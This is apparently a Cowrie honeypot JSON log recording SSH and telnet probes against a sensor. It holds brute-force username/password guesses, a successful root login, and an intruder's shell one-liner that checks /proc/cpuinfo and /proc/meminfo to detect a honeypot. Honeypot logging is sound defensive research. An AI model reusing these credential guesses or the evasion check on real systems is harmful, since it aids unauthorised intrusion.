{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T16:49:04.630820Z","session":"f9dde896087f"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:50:13.837141Z","src_ip":"212.227.235.229","session":"f9dde896087f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:51:17.420352Z","src_ip":"212.227.235.229","session":"0f013002b2ac"}
{"eventid":"cowrie.session.closed","duration":180.24650764465332,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:51:17.424073Z","src_ip":"212.227.235.229","session":"0f013002b2ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38941,"dst_ip":"1.2.3.4","dst_port":23,"session":"b67cef8dfbb2","protocol":"telnet","message":"New connection: 212.227.235.229:38941 (1.2.3.4:23) [session: b67cef8dfbb2]","sensor":"my-vps","timestamp":"2025-08-28T16:51:44.349852Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48648,"dst_ip":"1.2.3.4","dst_port":22,"session":"6aba47be8bb4","protocol":"ssh","message":"New connection: 212.227.235.229:48648 (1.2.3.4:22) [session: 6aba47be8bb4]","sensor":"my-vps","timestamp":"2025-08-28T16:51:56.263317Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:51:56.372841Z","src_ip":"212.227.235.229","session":"6aba47be8bb4"}
{"eventid":"cowrie.session.closed","duration":31.344173908233643,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:52:15.693951Z","src_ip":"212.227.235.229","session":"b67cef8dfbb2"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.161","src_port":65075,"dst_ip":"1.2.3.4","dst_port":22,"session":"75bd2a4501f6","protocol":"ssh","message":"New connection: 194.165.16.161:65075 (1.2.3.4:22) [session: 75bd2a4501f6]","sensor":"my-vps","timestamp":"2025-08-28T16:52:51.443118Z"}
{"eventid":"cowrie.client.version","version":"\u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","message":"Remote SSH version: \u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","sensor":"my-vps","timestamp":"2025-08-28T16:52:51.448900Z","src_ip":"194.165.16.161","session":"75bd2a4501f6"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:52:51.449866Z","src_ip":"194.165.16.161","session":"75bd2a4501f6"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":20344,"dst_ip":"1.2.3.4","dst_port":22,"session":"40a23027540c","protocol":"ssh","message":"New connection: 80.94.95.15:20344 (1.2.3.4:22) [session: 40a23027540c]","sensor":"my-vps","timestamp":"2025-08-28T16:53:10.182701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T16:53:10.183622Z","src_ip":"80.94.95.15","session":"40a23027540c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T16:53:10.258539Z","src_ip":"80.94.95.15","session":"40a23027540c"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron","message":"login attempt [byron/byron] failed","sensor":"my-vps","timestamp":"2025-08-28T16:53:11.538393Z","src_ip":"80.94.95.15","session":"40a23027540c"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron1","message":"login attempt [byron/byron1] failed","sensor":"my-vps","timestamp":"2025-08-28T16:53:12.633629Z","src_ip":"80.94.95.15","session":"40a23027540c"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron123","message":"login attempt [byron/byron123] failed","sensor":"my-vps","timestamp":"2025-08-28T16:53:13.730465Z","src_ip":"80.94.95.15","session":"40a23027540c"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron1234","message":"login attempt [byron/byron1234] failed","sensor":"my-vps","timestamp":"2025-08-28T16:53:14.839036Z","src_ip":"80.94.95.15","session":"40a23027540c"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron12345","message":"login attempt [byron/byron12345] failed","sensor":"my-vps","timestamp":"2025-08-28T16:53:16.253627Z","src_ip":"80.94.95.15","session":"40a23027540c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46898,"dst_ip":"1.2.3.4","dst_port":22,"session":"97cb6cc6ca62","protocol":"ssh","message":"New connection: 212.227.235.229:46898 (1.2.3.4:22) [session: 97cb6cc6ca62]","sensor":"my-vps","timestamp":"2025-08-28T16:53:17.704121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:53:17.704830Z","src_ip":"212.227.235.229","session":"97cb6cc6ca62"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:53:17.804862Z","src_ip":"212.227.235.229","session":"97cb6cc6ca62"}
{"eventid":"cowrie.login.failed","username":"ingres","password":"ingres","message":"login attempt [ingres/ingres] failed","sensor":"my-vps","timestamp":"2025-08-28T16:53:18.107154Z","src_ip":"212.227.235.229","session":"97cb6cc6ca62"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:53:18.267825Z","src_ip":"80.94.95.15","session":"40a23027540c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:53:19.209873Z","src_ip":"212.227.235.229","session":"97cb6cc6ca62"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.114.29","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2f8948b9b96","protocol":"ssh","message":"New connection: 196.251.114.29:51824 (1.2.3.4:22) [session: e2f8948b9b96]","sensor":"my-vps","timestamp":"2025-08-28T16:53:20.036711Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:53:20.065618Z","src_ip":"196.251.114.29","session":"e2f8948b9b96"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62554,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9e9167efe1b","protocol":"ssh","message":"New connection: 217.72.205.35:62554 (1.2.3.4:22) [session: a9e9167efe1b]","sensor":"my-vps","timestamp":"2025-08-28T16:53:58.250991Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:53:58.252428Z","src_ip":"217.72.205.35","session":"a9e9167efe1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60442,"dst_ip":"1.2.3.4","dst_port":22,"session":"356aede6a09d","protocol":"ssh","message":"New connection: 212.227.235.229:60442 (1.2.3.4:22) [session: 356aede6a09d]","sensor":"my-vps","timestamp":"2025-08-28T16:54:45.457133Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:54:45.635148Z","src_ip":"212.227.235.229","session":"356aede6a09d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60454,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e83d196ab76","protocol":"ssh","message":"New connection: 212.227.235.229:60454 (1.2.3.4:22) [session: 2e83d196ab76]","sensor":"my-vps","timestamp":"2025-08-28T16:54:45.812582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:54:45.813287Z","src_ip":"212.227.235.229","session":"2e83d196ab76"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T16:54:45.991657Z","src_ip":"212.227.235.229","session":"2e83d196ab76"}
{"eventid":"cowrie.login.failed","username":"msq","password":"a","message":"login attempt [msq/a] failed","sensor":"my-vps","timestamp":"2025-08-28T16:54:47.016773Z","src_ip":"212.227.235.229","session":"2e83d196ab76"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:54:48.656555Z","src_ip":"212.227.235.229","session":"2e83d196ab76"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.8","src_port":50480,"dst_ip":"1.2.3.4","dst_port":23,"session":"d4ce05c79c03","protocol":"telnet","message":"New connection: 205.210.31.8:50480 (1.2.3.4:23) [session: d4ce05c79c03]","sensor":"my-vps","timestamp":"2025-08-28T16:56:25.732922Z"}
{"eventid":"cowrie.session.closed","duration":30.963370323181152,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:56:56.696211Z","src_ip":"205.210.31.8","session":"d4ce05c79c03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33290,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a042bf7c8da","protocol":"ssh","message":"New connection: 212.227.235.229:33290 (1.2.3.4:22) [session: 0a042bf7c8da]","sensor":"my-vps","timestamp":"2025-08-28T16:57:11.725778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:57:11.726562Z","src_ip":"212.227.235.229","session":"0a042bf7c8da"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T16:57:11.834115Z","src_ip":"212.227.235.229","session":"0a042bf7c8da"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana","message":"login attempt [solana/solana] failed","sensor":"my-vps","timestamp":"2025-08-28T16:57:12.158844Z","src_ip":"212.227.235.229","session":"0a042bf7c8da"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:57:13.270163Z","src_ip":"212.227.235.229","session":"0a042bf7c8da"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":39352,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b009883ec51","protocol":"ssh","message":"New connection: 80.94.95.15:39352 (1.2.3.4:22) [session: 6b009883ec51]","sensor":"my-vps","timestamp":"2025-08-28T16:57:37.540743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T16:57:37.541652Z","src_ip":"80.94.95.15","session":"6b009883ec51"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T16:57:37.593058Z","src_ip":"80.94.95.15","session":"6b009883ec51"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"mohammed","message":"login attempt [mohammed/mohammed] failed","sensor":"my-vps","timestamp":"2025-08-28T16:57:38.141072Z","src_ip":"80.94.95.15","session":"6b009883ec51"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"abc123","message":"login attempt [mohammed/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T16:57:39.194785Z","src_ip":"80.94.95.15","session":"6b009883ec51"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"abcd123","message":"login attempt [mohammed/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T16:57:40.248857Z","src_ip":"80.94.95.15","session":"6b009883ec51"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"abcd1234","message":"login attempt [mohammed/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T16:57:41.303629Z","src_ip":"80.94.95.15","session":"6b009883ec51"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"abc1234","message":"login attempt [mohammed/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T16:57:42.357368Z","src_ip":"80.94.95.15","session":"6b009883ec51"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:57:43.413199Z","src_ip":"80.94.95.15","session":"6b009883ec51"}
{"eventid":"cowrie.session.connect","src_ip":"31.214.172.54","src_port":50844,"dst_ip":"1.2.3.4","dst_port":22,"session":"748a3ead76e7","protocol":"ssh","message":"New connection: 31.214.172.54:50844 (1.2.3.4:22) [session: 748a3ead76e7]","sensor":"my-vps","timestamp":"2025-08-28T16:58:23.836322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:58:23.955835Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T16:58:23.956714Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@2","message":"login attempt [root/Admin@2] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:58:24.812015Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:58:25.264771Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T16:58:25.265523Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T16:58:25.266258Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T16:58:25.268114Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T16:58:25.269070Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T16:58:25.270443Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T16:58:25.271347Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T16:58:25.272153Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T16:58:25.272915Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T16:58:25.274056Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T16:58:25.275140Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T16:58:25.422125Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:58:25.423012Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:58:25.733271Z","src_ip":"31.214.172.54","session":"748a3ead76e7"}
{"eventid":"cowrie.session.connect","src_ip":"49.250.239.119","src_port":49221,"dst_ip":"1.2.3.4","dst_port":23,"session":"6ecf2bc3671a","protocol":"telnet","message":"New connection: 49.250.239.119:49221 (1.2.3.4:23) [session: 6ecf2bc3671a]","sensor":"my-vps","timestamp":"2025-08-28T16:58:30.460397Z"}
{"eventid":"cowrie.session.closed","duration":13.272515773773193,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:58:43.732842Z","src_ip":"49.250.239.119","session":"6ecf2bc3671a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36979,"dst_ip":"1.2.3.4","dst_port":23,"session":"211db48557a4","protocol":"telnet","message":"New connection: 212.227.235.229:36979 (1.2.3.4:23) [session: 211db48557a4]","sensor":"my-vps","timestamp":"2025-08-28T16:59:02.338366Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62516,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f8e291fd22c","protocol":"ssh","message":"New connection: 212.227.235.229:62516 (1.2.3.4:22) [session: 4f8e291fd22c]","sensor":"my-vps","timestamp":"2025-08-28T16:59:06.354874Z"}
